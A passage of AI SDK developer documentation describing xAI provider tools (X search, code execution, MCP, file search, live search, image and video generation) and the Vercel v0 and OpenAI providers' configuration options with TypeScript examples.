      allowedXHandles: ['elonmusk', 'xai'],
      fromDate: '2025-10-23',
      toDate: '2025-10-30',
      enableImageUnderstanding: true,
      enableVideoUnderstanding: true,
    }),
  },
});

X Search Parameters

allowedXHandles string[]

Only search posts from specified X handles (max 10). Cannot be used with excludedXHandles.
excludedXHandles string[]

Exclude posts from specified X handles (max 10). Cannot be used with allowedXHandles.
fromDate string

Start date for posts in ISO8601 format (YYYY-MM-DD).
toDate string

End date for posts in ISO8601 format (YYYY-MM-DD).
enableImageUnderstanding boolean

Enable the model to view and analyze images in X posts.
enableVideoUnderstanding boolean

Enable the model to view and analyze videos in X posts.

Code Execution Tool

The code execution tool enables the model to write and execute Python code for calculations and data analysis:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt:
    'Calculate the compound interest for $10,000 at 5% annually for 10 years',
  tools: {
    code_execution: xai.tools.codeExecution(),
  },
});

View Image Tool

The view image tool enables the model to view and analyze images:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Describe what you see in the image',
  tools: {
    view_image: xai.tools.viewImage(),
  },
});

View X Video Tool

The view X video tool enables the model to view and analyze videos from X (Twitter) posts:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Summarize the content of this X video',
  tools: {
    view_x_video: xai.tools.viewXVideo(),
  },
});

MCP Server Tool

The MCP server tool enables the model to connect to remote Model Context Protocol (MCP) servers and use their tools:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Use the weather tool to check conditions in San Francisco',
  tools: {
    weather_server: xai.tools.mcpServer({
      serverUrl: 'https://example.com/mcp',
      serverLabel: 'weather-service',
      serverDescription: 'Weather data provider',
      allowedTools: ['get_weather', 'get_forecast'],
    }),
  },
});

MCP Server Parameters

serverUrl string (required)

The URL of the remote MCP server.
serverLabel string

A label to identify the MCP server.
serverDescription string

A description of what the MCP server provides.
allowedTools string[]

List of tool names that the model is allowed to use from the MCP server. If not specified, all tools are allowed.
headers Record<string, string>

Custom headers to include when connecting to the MCP server.
authorization string

Authorization header value for authenticating with the MCP server (e.g., 'Bearer token123').

File Search Tool

The file search tool enables searching through documents stored in xAI vector stores (collections):

import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { streamText } from 'ai';

const result = streamText({
  model: xai.responses('grok-4.20-reasoning'),
  prompt: 'What documents do you have access to?',
  tools: {
    file_search: xai.tools.fileSearch({
      vectorStoreIds: ['collection_your-collection-id'],
      maxNumResults: 10,
    }),
  },
  providerOptions: {
    xai: {
      include: ['file_search_call.results'],
    } satisfies XaiLanguageModelResponsesOptions,
  },
});

File Search Parameters

vectorStoreIds string[] (required)

The IDs of the vector stores (collections) to search.
maxNumResults number

The maximum number of results to return from the search.

Provider Options for File Search

include Array<'file_search_call.results'>

Include file search results in the response. When set to ['file_search_call.results'], the response will contain the actual search results with file content and scores.

Multiple Tools

You can combine multiple server-side tools for comprehensive research:

import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';

const { fullStream } = streamText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Research AI safety developments and calculate risk metrics',
  tools: {
    web_search: xai.tools.webSearch(),
    x_search: xai.tools.xSearch(),
    code_execution: xai.tools.codeExecution(),
    file_search: xai.tools.fileSearch({
      vectorStoreIds: ['collection_your-documents'],
    }),
    data_service: xai.tools.mcpServer({
      serverUrl: 'https://data.example.com/mcp',
      serverLabel: 'data-service',
    }),
  },
});

for await (const part of fullStream) {
  if (part.type === 'text-delta') {
    process.stdout.write(part.text);
  } else if (part.type === 'source' && part.sourceType === 'url') {
    console.log('\nSource:', part.url);
  }
}

Provider Options

The Responses API supports the following provider options:

import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';

const result = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  providerOptions: {
    xai: {
      reasoningEffort: 'high',
    } satisfies XaiLanguageModelResponsesOptions,
  },
  // ...
});

The following provider options are available:

reasoningEffort 'low' | 'medium' | 'high'

Control the reasoning effort for the model. Higher effort may produce more thorough results at the cost of increased latency and token usage.
logprobs boolean

Return log probabilities for output tokens.
topLogprobs number

Number of most likely tokens to return per token position (0-8). When set, logprobs is automatically enabled.
include Array<'file_search_call.results'>

Specify additional output data to include in the model response. Use ['file_search_call.results'] to include file search results with scores and content.
store boolean

Whether to store the input message(s) and model response for later retrieval. Defaults to true.
previousResponseId string

The ID of the previous response from the model. You can use it to continue a conversation.

Live Search

xAI models support Live Search functionality, allowing them to query real-time data from various sources and include it in responses with citations.

Basic Search

To enable search, specify searchParameters with a search mode:

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'What are the latest developments in AI?',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'auto', // 'auto', 'on', or 'off'
        returnCitations: true,
        maxSearchResults: 5,
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

console.log(text);
console.log('Sources:', sources);

Search Parameters

The following search parameters are available:

mode 'auto' | 'on' | 'off'

Search mode preference:
- 'auto' (default): Model decides whether to search
- 'on': Always enables search
- 'off': Disables search completely
returnCitations boolean

Whether to return citations in the response. Defaults to true.
fromDate string

Start date for search data in ISO8601 format (YYYY-MM-DD).
toDate string

End date for search data in ISO8601 format (YYYY-MM-DD).
maxSearchResults number

Maximum number of search results to consider. Defaults to 20, max 50.
sources Array<SearchSource>

Data sources to search from. Defaults to ["web", "x"] if not specified.

Search Sources

You can specify different types of data sources for search:

Web Search

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Best ski resorts in Switzerland',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'web',
            country: 'CH', // ISO alpha-2 country code
            allowedWebsites: ['ski.com', 'snow-forecast.com'],
            safeSearch: true,
          },
        ],
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

Web source parameters

country string: ISO alpha-2 country code
allowedWebsites string[]: Max 5 allowed websites
excludedWebsites string[]: Max 5 excluded websites
safeSearch boolean: Enable safe search (default: true)

X (Twitter) Search

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Latest updates on Grok AI',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'x',
            includedXHandles: ['grok', 'xai'],
            excludedXHandles: ['openai'],
            postFavoriteCount: 10,
            postViewCount: 100,
          },
        ],
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

X source parameters

includedXHandles string[]: Array of X handles to search (without @ symbol)
excludedXHandles string[]: Array of X handles to exclude from search (without @ symbol)
postFavoriteCount number: Minimum favorite count of the X posts to consider.
postViewCount number: Minimum view count of the X posts to consider.

News Search

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Recent tech industry news',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'news',
            country: 'US',
            excludedWebsites: ['tabloid.com'],
            safeSearch: true,
          },
        ],
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

News source parameters

country string: ISO alpha-2 country code
excludedWebsites string[]: Max 5 excluded websites
safeSearch boolean: Enable safe search (default: true)

RSS Feed Search

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Latest status updates',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'rss',
            links: ['https://status.x.ai/feed.xml'],
          },
        ],
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

RSS source parameters

links string[]: Array of RSS feed URLs (max 1 currently supported)

Multiple Sources

You can combine multiple data sources in a single search:

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Comprehensive overview of recent AI breakthroughs',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        returnCitations: true,
        maxSearchResults: 15,
        sources: [
          {
            type: 'web',
            allowedWebsites: ['arxiv.org', 'openai.com'],
          },
          {
            type: 'news',
            country: 'US',
          },
          {
            type: 'x',
            includedXHandles: ['openai', 'deepmind'],
          },
        ],
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

Sources and Citations

When search is enabled with returnCitations: true, the response includes sources that were used to generate the answer:

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';

const { text, sources } = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'What are the latest developments in AI?',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'auto',
        returnCitations: true,
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

// Access the sources used
for (const source of sources) {
  if (source.sourceType === 'url') {
    console.log('Source:', source.url);
  }
}

Streaming with Search

Live Search works with streaming responses. Citations are included when the stream completes:

import { xai, type XaiLanguageModelChatOptions } from '@ai-sdk/xai';
import { streamText } from 'ai';

const result = streamText({
  model: xai('grok-3-latest'),
  prompt: 'What has happened in tech recently?',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'auto',
        returnCitations: true,
      },
    } satisfies XaiLanguageModelChatOptions,
  },
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log('Sources:', await result.sources);

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Reasoning
`grok-4.20-reasoning`
`grok-4.20-non-reasoning`
`grok-4-1-fast-reasoning`
`grok-4-1-fast-non-reasoning`
`grok-4-1`
`grok-4-fast-reasoning`
`grok-4-fast-non-reasoning`
`grok-code-fast-1`
`grok-3`
`grok-3-mini`

Image Models

You can create xAI image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: 'A futuristic cityscape at sunset',
});

Image Editing

xAI supports image editing through the grok-imagine-image model. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
});

Multi-Image Editing

Combine or reference multiple input images in the prompt:

import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';

const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');

const { images } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: {
    text: 'Combine these two animals into a group photo',
    images: [cat, dog],
  },
});

Style Transfer

Apply artistic styles to an image:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: {
    text: 'Transform this into a watercolor painting style',
    images: [imageBuffer],
  },
  aspectRatio: '1:1',
});

Image Provider Options

You can customize the image generation behavior with provider-specific settings via providerOptions.xai:

import { xai, type XaiImageModelOptions } from '@ai-sdk/xai';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: xai.image('grok-imagine-image-pro'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    xai: {
      resolution: '2k',
      quality: 'high',
    } satisfies XaiImageModelOptions,
  },
});

resolution '1k' | '2k'

Output resolution. 1k produces ~1024×1024 images, 2k produces ~2048×2048 images (actual dimensions vary based on aspect ratio). Available for grok-imagine-image-pro.
quality 'low' | 'medium' | 'high'

Image quality level. Higher quality may increase generation time.

Image Model Capabilities

Model	Resolution	Aspect Ratios	Image Editing
`grok-imagine-image-pro`	`1k`, `2k`	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`, `2:1`, `1:2`, `19.5:9`, `9:19.5`, `20:9`, `9:20`, `auto`
`grok-imagine-image`	`1k`	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`, `2:1`, `1:2`, `19.5:9`, `9:19.5`, `20:9`, `9:20`, `auto`

Video Models

You can create xAI video models using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

This provider supports standard video generation from text prompts or image input, plus explicit video editing, video extension, and reference-to-video (R2V) operations.

Text-to-Video

Generate videos from text prompts:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'A chicken flying into the sunset in the style of 90s anime.',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    xai: {
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies XaiVideoModelOptions,
  },
});

Generation with Image Input

Generate videos using an image as the starting frame with an optional text prompt. This uses the standard generation path rather than a separate provider mode:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: {
    image: 'https://example.com/start-frame.png',
    text: 'The cat slowly turns its head and blinks',
  },
  duration: 5,
  providerOptions: {
    xai: {
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies XaiVideoModelOptions,
  },
});

Video Editing

Edit an existing video using a text prompt by providing a source video URL via provider options:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'Give the person sunglasses and a hat',
  providerOptions: {
    xai: {
      mode: 'edit-video',
      videoUrl: 'https://example.com/source-video.mp4',
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies XaiVideoModelOptions,
  },
});

Chaining and Concurrent Edits

The xAI-hosted video URL is available in providerMetadata.xai.videoUrl. You can use it to chain sequential edits or branch into concurrent edits using Promise.all:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const providerOptions = {
  xai: {
    mode: 'edit-video',
    videoUrl: 'https://example.com/source-video.mp4',
    pollTimeoutMs: 600000,
  } satisfies XaiVideoModelOptions,
};

// Step 1: Apply an initial edit
const step1 = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'Add a party hat to the person',
  providerOptions,
});

// Get the xAI-hosted URL from provider metadata
const step1VideoUrl = step1.providerMetadata?.xai?.videoUrl as string;

// Step 2: Apply two more edits concurrently, building on step 1
const [withSunglasses, withScarf] = await Promise.all([
  generateVideo({
    model: xai.video('grok-imagine-video'),
    prompt: 'Add sunglasses',
    providerOptions: {
      xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
    },
  }),
  generateVideo({
    model: xai.video('grok-imagine-video'),
    prompt: 'Add a scarf',
    providerOptions: {
      xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
    },
  }),
]);

Video Extension

Extend an existing video from its last frame. The duration controls the length of the extension only, not the total output. The output inherits aspectRatio and resolution from the source video.

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

// Step 1: Generate a source video
const source = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'A cat sitting on a sunlit windowsill, tail gently swishing.',
  duration: 5,
  aspectRatio: '16:9',
  providerOptions: {
    xai: {
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});

const sourceUrl = source.providerMetadata?.xai?.videoUrl as string;

// Step 2: Extend the video with a new scene
const extended = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'The cat turns its head, notices a butterfly, and leaps off.',
  duration: 6,
  providerOptions: {
    xai: {
      mode: 'extend-video',
      videoUrl: sourceUrl,
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});

Reference-to-Video (R2V)

Provide reference images to guide the video's style and content. Unlike image-to-video, reference images are not used as the first frame — the model incorporates their visual elements into the generated video. Each reference image can be a public HTTPS URL or a base64 data URI.

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt:
    'The comic cat from <IMAGE_1> and the comic dog from <IMAGE_2> ' +
    'are having a playful chase through a sunlit park. ' +
    'Cinematic slow-motion, warm afternoon light.',
  duration: 8,
  aspectRatio: '16:9',
  providerOptions: {
    xai: {
      mode: 'reference-to-video',
      referenceImageUrls: [
        'https://example.com/comic-cat.png',
        'https://example.com/comic-dog.png',
      ],
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});

Use <IMAGE_1>, <IMAGE_2>, etc. in your prompt to reference specific images. Up to 7 reference images are supported per request.

Video Provider Options

The following provider options are available via providerOptions.xai. You can validate the provider options using the XaiVideoModelOptions type.

pollIntervalMs number

Polling interval in milliseconds for checking task status. Defaults to 5000.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
resolution '480p' | '720p'

Video resolution. When using the SDK's standard resolution parameter, 1280x720 maps to 720p and 854x480 maps to 480p. Use this provider option to pass the native format directly.
mode 'edit-video' | 'extend-video' | 'reference-to-video'

Selects the explicit video operation. Each mode is mutually exclusive:
- 'edit-video' — edit an existing video (requires videoUrl)
- 'extend-video' — extend a video from its last frame (requires videoUrl)
- 'reference-to-video' — generate from reference images (requires referenceImageUrls)
When omitted, standard generation is used. Legacy inputs are still auto-detected from fields for backward compatibility.
videoUrl string

URL of a source video. Used with mode: 'edit-video' for video editing and mode: 'extend-video' for video extension.
referenceImageUrls string[]

Array of reference image URLs (1–7 images) or base64 data URIs for reference-to-video (R2V) generation. The model incorporates visual elements from these images without using them as the first frame. Use <IMAGE_1>, <IMAGE_2>, etc. in the prompt to reference specific images. Used with mode: 'reference-to-video'.

Aspect Ratio and Resolution

For text-to-video, you can specify both aspectRatio and resolution. The default aspect ratio is 16:9 and the default resolution is 480p.

For image-to-video, the output defaults to the input image's aspect ratio. If you specify aspectRatio, it will override this and stretch the image to the desired ratio.

For video editing, the output matches the input video's aspect ratio and resolution. Custom duration, aspectRatio, and resolution are not supported — the output resolution is capped at 720p (e.g., a 1080p input will be downsized to 720p).

For video extension, the output inherits aspectRatio and resolution from the source video. duration is supported and controls only the extension length.

For reference-to-video (R2V), you can specify duration, aspectRatio, and resolution just like text-to-video.

Video Model Capabilities

Model	Duration	Aspect Ratios	Resolution	Image-to-Video	Editing	Extension	R2V
`grok-imagine-video`	1–15s	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`	`480p`, `720p`

title: Vercel description: Learn how to use Vercel's v0 models with the AI SDK.

Vercel Provider

The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0 models support text and image inputs and provide fast streaming responses.

You can create your Vercel API key at v0.dev.

Features

Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
Auto-fix: Identifies and corrects common coding issues during generation
Quick edit: Streams inline edits as they're available
Multimodal: Supports both text and image inputs

Setup

The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:

Provider Instance

You can import the default provider instance vercel from @ai-sdk/vercel:

import { vercel } from '@ai-sdk/vercel';

If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:

import { createVercel } from '@ai-sdk/vercel';

const vercel = createVercel({
  apiKey: process.env.VERCEL_API_KEY ?? '',
});

You can use the following optional settings to customize the Vercel provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.v0.dev/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the VERCEL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vercel('v0-1.5-md'),
  prompt: 'Create a Next.js AI chatbot',
});

Vercel language models can also be used in the streamText function (see AI SDK Core).

Models

v0-1.5-md

The v0-1.5-md model is for everyday tasks and UI generation.

v0-1.5-lg

The v0-1.5-lg model is for advanced thinking or reasoning.

v0-1.0-md (legacy)

The v0-1.0-md model is the legacy model served by the v0 API.

All v0 models have the following capabilities:

Supports text and image inputs (multimodal)
Supports function/tool calls
Streaming responses with low latency
Optimized for frontend and full-stack web development

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`v0-1.5-md`
`v0-1.5-lg`
`v0-1.0-md`

title: OpenAI description: Learn how to use the OpenAI provider for the AI SDK.

OpenAI Provider

The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.

Setup

The OpenAI provider is available in the @ai-sdk/openai module. You can install it with

Provider Instance

You can import the default provider instance openai from @ai-sdk/openai:

import { openai } from '@ai-sdk/openai';

If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:

import { createOpenAI } from '@ai-sdk/openai';

const openai = createOpenAI({
  // custom settings, e.g.
  headers: {
    'header-name': 'header-value',
  },
});

You can use the following optional settings to customize the OpenAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.openai.com/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the OPENAI_API_KEY environment variable.
name string

The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to openai.
organization string

OpenAI Organization.
project string

OpenAI project.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

The OpenAI provider instance is a function that you can invoke to create a language model:

const model = openai('gpt-5');

It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:

const model = openai('gpt-5', {
  // additional settings
});

Example

You can use OpenAI language models to generate text with the generateText function:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Responses Models

You can use the OpenAI responses API with the openai(modelId) or openai.responses(modelId) factory methods. It is the default API that is used by the OpenAI provider (since AI SDK 5).

const model = openai('gpt-5');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAILanguageModelResponsesOptions type.

import { openai, OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'), // or openai.responses('gpt-5')
  providerOptions: {
    openai: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAILanguageModelResponsesOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean

Whether to store the generation. Defaults to true.
maxToolCalls integer The maximum number of total calls to built-in tools that can be processed in a response. This maximum number applies across all built-in tool calls, not per individual tool. Any further attempts to call a tool by the model will be ignored.
metadata Record<string, string> Additional metadata to store with the generation.
conversation string The ID of the OpenAI Conversation to continue. You must create a conversation first via the OpenAI API. Cannot be used in conjunction with previousResponseId. Defaults to undefined.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
logprobs boolean | number Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true returns the log probabilities of the tokens that were generated. Setting to a number (1-20) returns the log probabilities of the top n tokens that were generated.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'none' | 'minimal' | 'low' | 'medium' | 'high' | 'xhigh' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.

reasoningSummary 'auto' | 'detailed' Controls whether the model returns its reasoning process. Set to 'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as events with type 'reasoning' and in non-streaming responses within the reasoning field.
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to true.

serviceTier 'auto' | 'flex' | 'priority' | 'default' Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).

Defaults to 'auto'.
textVerbosity 'low' | 'medium' | 'high' Controls the verbosity of the model's response. Lower values result in more concise responses, while higher values result in more verbose responses. Defaults to 'medium'.
include Array<string> Specifies additional content to include in the response. Supported values: ['file_search_call.results'] for including file search results in responses. ['message.output_text.logprobs'] for logprobs. Defaults to undefined.
truncation string The truncation strategy to use for the model response.
- Auto: If the input to this Response exceeds the model's context window size, the model will truncate the response to fit the context window by dropping items from the beginning of the conversation.
- disabled (default): If the input size will exceed the context window size for a model, the request will fail with a 400 error.
promptCacheKey string A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
promptCacheRetention 'in_memory' | '24h' The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
safetyIdentifier string A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
systemMessageMode 'system' | 'developer' | 'remove' Controls the role of the system message when making requests. By default (when omitted), for models that support reasoning the system message is automatically converted to a developer message. Setting systemMessageMode to system passes the system message as a system-level instruction; developer passes it as a developer message; remove omits the system message from the request.
forceReasoning boolean Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults systemMessageMode to developer unless overridden.

The OpenAI responses provider also returns provider-specific metadata:

For Responses models, you can type this metadata using OpenaiResponsesProviderMetadata:

import { openai, type OpenaiResponsesProviderMetadata } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
});

const providerMetadata = result.providerMetadata as
  | OpenaiResponsesProviderMetadata
  | undefined;

const { responseId, logprobs, serviceTier } = providerMetadata?.openai ?? {};

// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);

The following OpenAI-specific metadata may be returned:

responseId string | null | undefined The ID of the response. Can be used to continue a conversation.
logprobs (optional) Log probabilities of output tokens (when enabled).
serviceTier (optional) Service tier information returned by the API.

Reasoning Output

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(`Reasoning: ${part.textDelta}`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'auto',
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});
console.log('Reasoning:', result.reasoning);

Learn more about reasoning summaries in the OpenAI documentation.

WebSocket Transport

OpenAI's WebSocket API keeps a persistent connection open, which can significantly reduce Time-to-First-Byte (TTFB) in agentic workflows with many tool calls. After the initial connection, subsequent requests skip TCP/TLS/HTTP negotiation entirely.

The ai-sdk-openai-websocket-fetch package provides a drop-in fetch replacement that routes streaming requests through a persistent WebSocket connection.

Pass the WebSocket fetch to createOpenAI via the fetch option:

import { createOpenAI } from '@ai-sdk/openai';
import { createWebSocketFetch } from 'ai-sdk-openai-websocket-fetch';
import { streamText } from 'ai';

// Create a WebSocket-backed fetch instance
const wsFetch = createWebSocketFetch();
const openai = createOpenAI({ fetch: wsFetch });

const result = streamText({
  model: openai('gpt-4.1-mini'),
  prompt: 'Hello!',
  tools: {
    // ...
  },
  onFinish: () => wsFetch.close(), // close the WebSocket when done
});

The first request will be slower because it must establish the WebSocket connection (DNS + TCP + TLS + WebSocket upgrade). After that, subsequent steps in a multi-step tool-calling loop reuse the open connection, resulting in lower TTFB per step.

You can see a live side-by-side comparison of HTTP vs WebSocket streaming performance in the demo app.

Verbosity Control

You can control the length and detail of model responses using the textVerbosity parameter:

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5-mini'),
  prompt: 'Write a poem about a boy and his first pet dog.',
  providerOptions: {
    openai: {
      textVerbosity: 'low', // 'low' for concise, 'medium' (default), or 'high' for verbose
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

